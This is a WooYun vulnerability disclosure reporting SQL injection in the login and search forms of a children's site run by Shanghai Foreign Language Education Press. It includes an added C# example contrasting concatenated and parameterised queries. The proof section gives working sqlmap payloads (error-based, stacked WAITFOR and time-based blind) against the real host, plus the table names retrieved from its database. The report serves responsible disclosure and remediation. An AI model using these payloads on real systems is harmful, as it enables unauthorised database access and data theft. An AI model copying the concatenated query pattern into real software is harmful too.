
Vulnerability summary

Defect ID: wooyun-2015-0138465

Title: SQL injection on a site of Shanghai Foreign Language Education Press

Vendor: sflep.com

Author: 路人甲

Submitted: 2015-09-02 10:52

Fixed: 2015-10-17 11:02

Disclosed: 2015-10-17 11:02

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-02: Details sent to the vendor, awaiting vendor handling
2015-09-02: Vendor has confirmed; details disclosed to the vendor only
2015-09-12: Details disclosed to core white hats and relevant domain experts
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

http://kids.sflep.com/wicresoft.pgs.web/default.aspx?SignIn=true
http://kids.sflep.com/Wicresoft.FeedBack/InformationSearch.aspx


Link 1: POST injection in the user login form.
Link 2: POST injection in the three search boxes.
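The report leaves the fix section empty, so the following is an added example (not code from the report, from sflep.com, or from the Wicresoft application it runs) of the defect class behind the search-box finding and the change that closes it. It is a plain ADO.NET search handler for SQL Server of the kind an ASP.NET WebForms page would call: the first method splices the three search fields into the SQL text, which is what lets a quote, a semicolon or a comment marker in a field change the statement; the second sends the same values as SqlParameter objects, so the statement text is fixed before any user input is seen, and error-based, stacked and time-based variants all lose their foothold at once. The table and column names (dbo.Inform, Title, SubTitle, Keywords), the connection string and the field lengths are assumptions for illustration.

```csharp
// Added example, not code from the report or the vendor. Table, column and
// connection-string values below are placeholders chosen for illustration.
using System;
using System.Data;
using System.Data.SqlClient;

public static class InfoSearch
{
    // Placeholder; supply a real connection string from configuration.
    private const string ConnString = "<connection-string-placeholder>";

    // VULNERABLE: the three search boxes are concatenated into the SQL text,
    // so characters in the input are read by the server as part of the query.
    public static DataTable SearchUnsafe(string title, string subTitle, string keywords)
    {
        string sql = "SELECT Title, SubTitle, Keywords FROM dbo.Inform " +
                     "WHERE Title LIKE '%" + title + "%' " +
                     "AND SubTitle LIKE '%" + subTitle + "%' " +
                     "AND Keywords LIKE '%" + keywords + "%'";
        using (SqlConnection conn = new SqlConnection(ConnString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        using (SqlDataAdapter da = new SqlDataAdapter(cmd))
        {
            DataTable dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // HARDENED: the statement text is a constant; the values travel as typed
    // parameters and can never become SQL syntax. Explicit types and lengths
    // also stop an oversized field from reaching the database.
    public static DataTable SearchSafe(string title, string subTitle, string keywords)
    {
        const string sql = "SELECT Title, SubTitle, Keywords FROM dbo.Inform " +
                           "WHERE Title LIKE @title " +
                           "AND SubTitle LIKE @subTitle " +
                           "AND Keywords LIKE @keywords";
        using (SqlConnection conn = new SqlConnection(ConnString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        using (SqlDataAdapter da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@title", SqlDbType.NVarChar, 200).Value = LikePattern(title);
            cmd.Parameters.Add("@subTitle", SqlDbType.NVarChar, 200).Value = LikePattern(subTitle);
            cmd.Parameters.Add("@keywords", SqlDbType.NVarChar, 200).Value = LikePattern(keywords);
            DataTable dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // Parameters stop injection but do not neutralise LIKE wildcards, so escape
    // '[', '%' and '_' with SQL Server's bracket syntax before adding the '%' ends.
    // The '[' replacement runs first so the brackets it emits are not re-escaped.
    internal static string LikePattern(string value)
    {
        if (value == null)
        {
            value = string.Empty;
        }
        string escaped = value.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
        return "%" + escaped + "%";
    }
}
```

The same change applies to the login form named in Link 1: the username and password fields go into a parameterised query, and the comparison of a stored password hash happens in application code rather than in concatenated SQL. Reviewing the application for every other place that builds a command from Request values is the rest of the remediation, since sqlmap only reports the parameters it was pointed at.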

Proof of vulnerability:

[Screenshot: 火狐截图_2015-09-01T12-42-37.187Z.png]
[Screenshot: 火狐截图_2015-09-01T12-43-03.435Z.png]


sqlmap identified the following injection point(s) with a total of 210 HTTP(s) requests:
---
Parameter: tbSubTitle (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a' AND 1453=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1453=1453) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'omDb' LIKE 'omDb&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a';WAITFOR DELAY '0:0:5'--&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=dDwtMjEzNzE2Nzg0Nzt0PDtsPGk8MT47PjtsPHQ8O2w8aTwxMT47PjtsPHQ8QDA8cDxwPGw8TWFpbk9yZGVyO0RhdGFLZXlzO1BhZ2VDb3VudDtWaXJ0dWFsSXRlbUNvdW50O09yZGVyO18hRGF0YVNvdXJjZUl0ZW1Db3VudDtfIUl0ZW1Db3VudDtDdXJyZW50UGFnZUluZGV4Oz47bDxJbmZvR3VpZDtsPD47aTwxPjtpPDA+O0luZm9HdWlkO2k8MD47aTwwPjtpPDA+Oz4+Oz47Ozs7Ozs7Ozs7PjtsPGk8MD47PjtsPHQ8O2w8aTwzPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8cDxsPENvbHVtblNwYW47PjtsPGk8ND47Pj47Pjs7Pjs+Pjs+Pjs+Pjs+Pjs+Pjs+JiKNDu1oGAO0QpqBGnAbVot0dxQ=&__VIEWSTATEGENERATOR=4895100B&tbTitle=&tbSubTitle=a' WAITFOR DELAY '0:0:5'--&tbKeywords=&btnSearch=%E6%90%9C%E7%B4%A2
---
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
current database: 'PortalIPSVer2'
[18:48:34] [INFO] retrieved: dbo.AppGroup
[18:51:02] [INFO] retrieved: dbo.Application
[18:52:50] [INFO] retrieved: dbo.Attachment
[18:54:51] [INFO] retrieved: dbo.Category
[18:56:27] [INFO] retrieved: dbo.CategoryInfoType
[18:58:32] [INFO] retrieved: dbo.CategoryRuleRelation
[19:01:14] [INFO] retrieved: dbo.CategoryType
[19:03:40] [INFO] retrieved: dbo.Comment
[19:06:52] [INFO] retrieved: dbo.CommentReceiver
[19:10:39] [INFO] retrieved: dbo.D99_CMD
[19:13:17] [INFO] retrieved: dbo.D99_REG
[19:14:53] [INFO] retrieved: dbo.D99_Tmp
[19:16:58] [INFO] retrieved: dbo.dtproperties
[19:22:24] [INFO] retrieved: dbo.Group
[19:35:19] [INFO] retrieved: dbo.InfoCategoryView
[19:36:47] [INFO] retrieved: dbo.InfoReceiver
[19:38:30] [INFO] retrieved: dbo.Inform
Blind injection is too slow; I did not wait for the rest.

Fix recommendation:

1

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 6

Confirmed: 2015-09-02 11:00

Vendor reply:

Thank you for pointing out the vulnerability.

Latest status:

None yet